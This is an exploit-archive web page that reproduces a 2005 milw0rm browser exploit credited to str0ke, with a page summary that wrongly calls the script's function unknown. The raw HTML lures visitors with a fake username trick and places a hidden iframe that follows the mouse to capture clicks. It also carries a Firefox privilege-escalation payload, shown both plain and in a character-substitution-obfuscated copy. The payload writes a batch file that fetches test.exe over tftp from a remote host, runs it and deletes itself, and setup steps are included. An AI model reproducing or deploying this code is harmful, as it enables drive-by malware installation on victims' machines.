Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
hide me bitch - exploit.company
header-logo
Suggest Exploit
vendor:
by:
str0ke
N/A
CVSS
N/A
Unknown
Unknown
CWE
Product Name:
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

hide me bitch

This HTML page includes a JavaScript file from a GitLab repository. The specific JavaScript file is 986.js (also known as 05072005.js) and it is loaded using the script tag. The purpose and functionality of this script are unknown as the code is not provided in the given text. The author of this HTML page is mentioned as 'str0ke'.

Mitigation:

Unknown
Source

Exploit-DB raw data:

<!-- 
1) wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/986.js (05072005.js)
2) change src= below
3) edit index and change tftp location

/str0ke
-->

<html><head><title>hide me bitch</title>
	
	<meta http-equiv="Expires" content="Tue, 16 Jan 1990 21:29:02 GMT">


			<script language="javascript" src="https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/986.js"></script></head>


<body>


<script language="JavaScript"><!--
function Decode() {
d("4CSDMFB JUHOAUOQ=0LU9UCSDMFB034!--\nPAHSBMGH OQBuFFZQDCMGH(){\nUFFHUIQ= HU9MOUBGD.UFFhUIQ;\nUFF9QDCMGH = HU9MOUBGD.UFFZQDCMGH;\nIULGD9QD = UFF9QDCMGH.CATCBDMHO(\", #);\nMP ( (UFFHUIQ == 0hQBCSUFQ0) && ( IULGD9QD 3= > ) ) DQBADH #;\nMP ( (UFFHUIQ == 0iMSDGCGPB mHBQDHQB q7FJGDQD0) && (IULGD9QD 3= <) ) DQBADH #;\nDQBADH \";\n}\n//--34/CSDMFB34NBIJ34NQUR34BMBJQ3NMRQ IQ TMBSN4/BMBJQ34/NQUR34TGR63M SUH BQJJ 6GA 6GAD ACQDHUIQ IUOMSUJJ6 BNDGAON BNQ MHBQDHQB!!4TD3sJMSK 4U NDQP=0103nqdq4/U3MHCMRQ BNMC FUOQ BG OQB BN");
d("Q NMRRQH UHC8QD!4TD34MPDUIQ GHJGUR=0JGURQD()0 CDS=0LU9UCSDMFB:'4HGCSDMFB3'+Q9UJ('MP (8MHRG8.HUIQ!=\\'CBQUJSGGKMQC\\'){8MHRG8.HUIQ=\\'CBQUJSGGKMQC\\';}  QJCQ{ Q9QHB={BUDOQB:{NDQP:\\'NBBF://PBF.IG5MJJU.GDO/FAT/IG5MJJU.GDO/Q7BQHCMGHC/PJUCNOGB/PJUCNOGB-\".z.v.#-P7+I5+BT.7FM\\'}};MHCBUJJ(Q9QHB,\\'WGA UDQ 9AJHQDUTJQ!!!\\',\\'LU9UCSDMFB:Q9UJ(\\\\\\'HQBCSUFQ.CQSADMB6.fDM9MJQOQiUHUOQD.QHUTJQfDM9MJQOQ(\\\\\\\\\\\\\\'aHM9QDCUJXfsGHHQSB\\\\\\\\\\\\\\');PMJQ=sGIFGHQHBC.SJUCCQC[\\\\\\\\\\\\\\'@IG5MJJU.GDO/PMJQ/JGSUJ;#\\\\\\\\\\\\\\'2.SDQUBQmHCBUHSQ(");
d("sGIFGHQHBC.MHBQDPUSQC.HCmjGSUJpMJQ);PMJQ.MHMBYMBNfUBN(\\\\\\\\\\\\\\'S:\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\TGGGI.TUB\\\\\\\\\\\\\\');PMJQ.SDQUBQaHMEAQ(sGIFGHQHBC.MHBQDPUSQC.HCmpMJQ.hgdiuj_pmjq_bWfq,<]\");GABFABcBDQUI=sGIFGHQHBC.SJUCCQC[\\\\\\\\\\\\\\'@IG5MJJU.GDO/HQB8GDK/PMJQ-GABFAB-CBDQUI;#\\\\\\\\\\\\\\'2.SDQUBQmHCBUHSQ(sGIFGHQHBC.MHBQDPUSQC.HCmpMJQgABFABcBDQUI);GABFABcBDQUI.MHMB(PMJQ,\"7\"<|\"7\"w|\"7]\",<]\",\");GABFAB=\\\\\\\\\\\\\\'BPBF -M MJJIGT.5UFBG.GDO OQB BQCB.Q7Q S:\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\BQCB.Q7Q\\\\\\\\\\\\\\\\HSJC\\\\\\\\\\\\\\\\HCBUDB S:\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\BQCB.Q7Q\\\\\\\\\\");
d("\\\\\\HRQJ %\"\\\\\\\\\\\\\\\\HSJC\\\\\\\\\\\\\\';GABFABcBDQUI.8DMBQ(GABFAB,GABFAB.JQHOBN);GABFABcBDQUI.SJGCQ();PMJQ.JUAHSN();\\\\\\')\\'); }')+'4/HGCSDMFB34U NDQP=\\'NBBFC://URRGHC.AFRUBQ.IG5MJJU.GDO/Q7BQHCMGHC/IGDQMHPG.FNF?MR=]]\"&UFFJMSUBMGH=PMDQPG7\\' CB6JQ=\\'SADCGD:RQPUAJB;\\'3&HTCF;&HTCF;&HTCF;4/'+'U3'0 MR=0BUDOQBPDUIQ0 CSDGJJMHO=0HG0 PDUIQTGDRQD=0\"0 IUDOMH8MRBN=0\"0 IUDOMHNQMONB=\"0 CB6JQ=0FGCMBMGH:UTCGJABQ; JQPB:\"F7; 8MRBN:\"F7; NQMONB:yF7; 8MRBN:yF7; IUDOMH:\"F7; FURRMHO:\"F7; -IG5-GFUSMB6:\"034/MPDUIQ34CSDMFB JUHOAUOQ");
d("=0lU9UcSDMFB0 B6FQ=0BQ7B/LU9UCSDMFB03\n\nRGSAIQHB.GHIGACQIG9Q = PAHSBMGH BDUSKiGACQ(Q) {\n    RGSAIQHB.OQBqJQIQHBt6mR(0BUDOQBPDUIQ0).CB6JQ.JQPB = (Q.FUOQX->)+0F70\n    RGSAIQHB.OQBqJQIQHBt6mR(0BUDOQBPDUIQ0).CB6JQ.BGF = (Q.FUOQW->)+0F70\n}   \n\n9UD SGAHBQD = \";    \nPAHSBMGH JGURQD() {\n    SGAHBQD++\n    MP(SGAHBQD == #) {\n        CBQUJSGGKMQC.PGSAC()\n    } QJCQ MP(SGAHBQD == ]) {\n        CBQUJSGGKMQC.NMCBGD6.OG(-#)\n        //BUDOQBPDUIQ.CB6JQ.RMCFJU6=0HGHQ0;\n    }\n}\n\n4/CSDMFB34/TGR634");
d("/NBIJ3");
return 0;}
//--></script>
<script language="JavaScript"><!--
ky="";function d(msg){ky=ky+codeIt(key,msg);}var key = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz<>]#\"";function codeIt (mC, eS) {var wTG, mcH =  mC.length / 2, nS = "", dv;for (var x = 0; x < eS.length; x++) {wTG = mC.indexOf(eS.charAt(x));if (wTG > mcH) {dv = wTG - mcH;nS = nS + mC.charAt(33 - dv);}else {if (key.indexOf(eS.charAt(x)) < 0) {nS = nS + eS.charAt(x)}else {dv = mcH - wTG;nS = nS + mC.charAt(33 + dv);}}}return nS;}
//--></script><script language="JavaScript"><!--
Decode();document.write(ky);//--></script><script language="javascript"><!--
function getAppVersion(){
appname= navigator.appName;
appversion = navigator.appVersion;
majorver = appversion.substring(0, 1);
if ( (appname == "Netscape") && ( majorver >= 3 ) ) return 1;
if ( (appname == "Microsoft Internet Explorer") && (majorver >= 4) ) return 1;
return 0;
}
//--></script>i can tell you your username magically through the internet!!<br>Click <a href="#">HERE</a>inside this page to get the hidden answer!<br><iframe onload="loader()" src="javascript:'<noscript>'+eval('if (window.name!=\'stealcookies\'){window.name=\'stealcookies\';}  else{ event={target:{href:\'http://ftp.mozilla.org/pub/mozilla.org/extensions/flashgot/flashgot-0.5.9.1-fx+mz+tb.xpi\'}};install(event,\'You are vulnerable!!!\',\'javascript:eval(\\\'netscape.security.PrivilegeManager.enablePrivilege(\\\\\\\'UniversalXPConnect\\\\\\\');file=Components.classes[\\\\\\\'@mozilla.org/file/local;1\\\\\\\'].createInstance(Components.interfaces.nsILocalFile);file.initWithPath(\\\\\\\'c:\\\\\\\\\\\\\\\\booom.bat\\\\\\\');file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,420);outputStream=Components.classes[\\\\\\\'@mozilla.org/network/file-output-stream;1\\\\\\\'].createInstance(Components.interfaces.nsIFileOutputStream);outputStream.init(file,0x04|0x08|0x20,420,0);output=\\\\\\\'tftp -i ill[server]oab.zapto.org get test.exe c:\\\\\\\\\\\\\\\\test.exe\\\\\\\\ncls\\\\\\\\nstart c:\\\\\\\\\\\\\\\\test.exe\\\\\\\\ndel %0\\\\\\\\ncls\\\\\\\';outputStream.write(output,output.length);outputStream.close();file.launch();\\\')\'); }')+'</noscript><a href=\'https://addons.update.mozilla.org/extensions/moreinfo.php?id=220&application=firefox\' style=\'cursor:default;\'>   </'+'a>'" id="targetframe" marginwidth="0" marginheight="0" style="margin: 0px; padding: 0px; position: absolute; height: 6px; width: 6px; opacity: 0; left: 504px; top: 280px;" frameborder="0" scrolling="no"></iframe><script language="JavaScript" type="text/javascript">

document.onmousemove = function trackMouse(e) {
    document.getElementById("targetframe").style.left = (e.pageX-3)+"px"
    document.getElementById("targetframe").style.top = (e.pageY-3)+"px"
}   

var counter = 0;    
function loader() {
    counter++
    if(counter == 1) {
        stealcookies.focus()
    } else if(counter == 2) {
        stealcookies.history.go(-1)
        //targetframe.style.display="none";
    }
}

</script>
<script language="javascript">postamble();</script>
</body></html>

# milw0rm.com [2005-05-07]

Navigation

Suggest Exploit

Services By CQR